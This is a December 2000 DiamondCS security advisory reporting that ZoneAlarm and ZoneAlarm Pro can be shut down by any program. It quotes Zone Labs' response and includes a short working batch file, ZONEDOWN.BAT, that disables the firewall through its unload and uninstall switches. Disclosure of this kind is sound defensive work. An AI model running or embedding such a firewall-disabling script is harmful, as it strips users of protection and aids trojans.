Diamond Computer Systems Security Advisory

http://www.diamondcs.com.au/alerts/zonedown.txt

VULNERABILITY: ZoneAlarm and ZoneAlarm Pro can be taken down with a tiny batch file.

SEVERITY: Low-Medium, but as Zone Labs will not be fixing the problem it could be considered Medium-High.

AFFECTED SOFTWARE: "Zone Alarm" and "Zone Alarm Pro" (Zone Labs Inc. - www.zonelabs.com), possibly all versions.

REMOTE EXPLOIT: No.

RELEASE DATE: Friday Dec 29, 2000

VENDOR NOTIFIED: Zone Labs Inc. were notified on Wednesday Dec 27, 2000, but as Zone Labs have given a final response to this particular vulnerability, it can now be disclosed to the public.

---

DESCRIPTION:
ZoneAlarm and ZoneAlarm Pro, like all good multi-filed programs, supports an Uninstall feature. The Uninstall routine executes zonealarm.exe (or zapro.exe in the Pro version), vsmon.exe, and minilog.exe, passing special uninstall and unload parameters to each program. By doing this, ZoneAlarm shuts down it's user interface and services.

THE PROBLEM:
By design, ZoneAlarm\ZoneAlarm Pro has no way of determining WHICH program is calling it to unload, thus allowing a trojan to execute the ZoneAlarm programs in the same way to shut down the firewall.

THE EXPLOIT:
A very trivial exploit - all a trojan has to do is look in HKEY_LOCAL_MACHINE\SOFTWARE\Zone Labs\ZoneAlarm\InstallDirectory to locate ZoneAlarm.exe (as just one of many ways to locate ZoneAlarm), then locate the Windows System32 directory before executing zonealarm.exe, vsmon.exe and minilog.exe, parsing each one the uninstall and unload parameters as specified in ZoneAlarm's Manual Uninstall.

ZONE LABS RESPONSE:
From Conrad Hermann, VP of Engineering at Zone Labs:
"...Of course, you are intended to be able to uninstall ZoneAlarm--as I'm sure you can tell, this is a very important thing to be able to do, since it is an introductory product for new users. In testing ZoneAlarm Pro, it seems you did not set a password, or else you would have reported that the password would be required to shut down using VSMON -unload. Without the password, vsmon -unload doesn't disable security."

In other words, if you get the buy-before-you-try version of ZA (ZoneAlarm Pro) AND you set passwords, you won't be vulnerable. As a matter of convenience, the majority of ZoneAlarm Pro users would _NOT_ use passwords - and by default there is no need for them to do so. It appears those who don't set passwords and regular ZoneAlarm users are left out in the cold with this one.

DEMONSTRATION:
Running this batch file will shut-down your ZoneAlarm\ZoneAlarm Pro firewall. The batch file assumes that you have installed ZoneAlarm\ZoneAlarm Pro into their default directory locations. Needless to say, this isn't a very efficient way of using the exploit, and a trojan would be a lot smarter in determining the locations of the four ZA executables, but this batch file demonstrates the simplicity of the vulnerability.

---File begins: ZONEDOWN.BAT ---
@echo off
@echo Shutting down ZoneAlarm and ZoneAlarm Pro, one moment...
c:\progra~1\zonela~1\zoneal~1\zapro.exe -unload
c:\progra~1\zonela~1\zoneal~1\zoneal~1.exe -unload
%windir%\system\zonelabs\vsmon.exe -unload -uninstall
%windir%\system\zonelabs\minilog.exe -unload -uninstall
%windir%\system32\zonelabs\vsmon.exe -unload -uninstall
%windir%\system32\zonelabs\minilog.exe -unload -uninstall
@echo Finished
@echo on
---File ends---


--
DiamondCS would like to thank Steve Gibson of grc.com for his mutual assistance to both DiamondCS and Zone Labs.

Publishing of this document is permitted providing the text is published in it's entirety and with no modifications.

Copyright (C) 2000, Diamond Computer Systems Pty. Ltd.
http://www.diamondcs.com.au - http://www.diamondcslabs.com